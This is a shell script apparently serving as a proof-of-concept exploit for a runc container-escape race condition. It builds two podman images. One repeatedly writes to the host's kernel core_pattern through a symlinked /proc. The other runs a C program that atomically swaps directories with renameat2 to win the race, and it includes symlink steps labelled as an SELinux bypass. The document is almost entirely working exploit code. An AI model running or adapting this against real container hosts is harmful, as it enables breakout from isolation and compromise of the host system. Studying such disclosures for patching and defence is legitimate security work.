runc-masked-race.sh

# First container 

cat <<EOF > Dockerfile.1
FROM busybox
ADD rootfs /
EOF

mkdir rootfs
ln -s evil/level1/level2 rootfs/proc

podman build -t poc-1 -f Dockerfile.1 .

while ! podman run -it --rm -v evil:/evil poc-1 sh -c "while ! echo pwn > /evil/level1~/level2/sys/kernel/core_pattern; do : ; done"; do : ; done

---

# Second container
# Atomic swap (race can be won with a bash loop in a few seconds, this is much faster)

cat <<EOF > race.c
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <linux/fs.h>

int main() {
    int fd1, fd2;

    fd1 = open("/evil/level1", O_DIRECTORY | O_RDONLY );
    fd2 = open("/evil/level1~", O_DIRECTORY | O_RDONLY );
    printf("fd1: %d | fd2: %d\n", fd1, fd2);
    while(1) {
        syscall(SYS_renameat2, fd1, "/evil/level1", fd2, "/evil/level1~", RENAME_EXCHANGE);
    }
}
EOF

gcc -o race race.c

cat <<EOF > race.sh
cd /evil

# Race is easier to win if we catch a few failure cases
mkdir -p level1{~,}/level2
mkdir level1{~,}/level2/{sysrc-trigger,scsi,bus,fs,irq,sys,acpi}
mkdir -p level1{~,}/level2/self/task/1/attr
touch level1{~,}/level2/self/task/1/attr/exec
mkdir -p level1{~,}/level2/self/fd
touch level1{~,}/level2/self/fd/5
touch level1{~,}/level2/self/status

# Bypass SELinux
ln -s -f /evil/level1/level2/self/sched level1~/level2/self/task/1/attr/exec
ln -s -f /evil/level1~/level2/self/sched level1/level2/self/task/1/attr/exec

/root/race
EOF

chmod +x race.sh race

cat <<EOF > Dockerfile.2
FROM fedora:30
ADD race /root/
ADD race.sh /root/
EOF

podman build -t poc-2 -f Dockerfile.2 .

podman run --rm --name evil-container -it -v evil:/evil poc-2 sh /root/race.sh